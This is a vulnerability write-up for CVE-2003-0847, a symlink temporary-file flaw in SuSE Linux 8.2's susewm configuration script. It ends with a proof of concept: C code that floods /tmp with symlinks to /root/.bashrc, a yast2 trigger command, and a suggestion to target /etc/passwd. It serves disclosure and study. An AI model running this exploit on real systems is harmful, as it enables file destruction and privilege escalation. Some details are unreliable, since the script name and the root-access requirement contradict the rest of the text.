CVE-2003-0847

A local attacker can exploit this vulnerability by creating symbolic links in the /tmp directory that point to sensitive target files, such as /root/.bashrc. The susewm.$$ temporary file is created without proper protections against symbolic link attacks. When the susewm script is executed, it will follow these symbolic links and overwrite the target file with its contents, potentially leading to privilege escalation or denial of service [ref_id=1].

The vulnerability lies within the susewm package, specifically in the susewm.$$ temporary file creation process, which is part of the SuSEconfig.susewm script. The script is susceptible to symbolic link attacks due to insufficient protection mechanisms for temporary file creation in the /tmp directory [ref_id=1].

The advisory does not specify a patch or provide details on how the vulnerability is fixed. It is recommended to upgrade to a patched version of the susewm package once available. Until then, users should be cautious of running untrusted susewm scripts.

# Proof of Concept for SuSEconfig.vmware Symbolic Link

This proof of concept demonstrates how a local attacker can overwrite arbitrary files using a symbolic link attack on the `susewm.$$` temporary file in SuSE Linux 8.2.

## Prerequisites

* SuSE Linux 8.2 * `yast2` installed and accessible

## Steps

1. **Create a target file:** The attacker creates a file they wish to overwrite. For example, to create `/root/.bashrc`: ```bash TARGET="/root/.bashrc" ```

2. **Create symbolic links:** The attacker creates numerous symbolic links in `/tmp` that point to the target file. The `susewm.$$` temporary file is used as the basis for the symlink attack. ```c #include <stdio.h> #include <unistd.h> #include <sys/types.h>

#define TARGET "/root/.bashrc" /* Change this for other attack */

int main(int argc, char *argv[]){ int i, first, last; char buffer[60];

fprintf(stdout,"Proof of Concept for Symbolic Link in SuSEconfig.vmware - Suse 8.2\n");

first = 0; last = 65535;

for(i = first; i < last + 1; i++){ bzero(buffer,50); snprintf(buffer,59,"ln -s %s /tmp/susewm.%d",TARGET,i); system(buffer); } return 0; } ``` Compile and run this C code. It will generate many symbolic links in `/tmp` named `susewm.0`, `susewm.1`, etc., all pointing to `/root/.bashrc`.

3. **Trigger the vulnerable script:** The attacker then needs to trigger a process that executes `SuSEconfig.susewm` with root privileges. The example suggests using `yast2` to uninstall a program: ```bash /sbin/yast2 'sw_single' ```

4. **Overwrite the target file:** When `yast2` runs `SuSEconfig.susewm` as root, the script will attempt to create or use a temporary file. Due to the presence of the symbolic links, it will instead write to the target file (`/root/.bashrc` in this example), effectively overwriting it.

**Note:** This PoC is for demonstration purposes and requires local root access or the ability to execute commands as root. The `TARGET` variable can be changed to other sensitive files like `/etc/passwd` for denial-of-service attacks.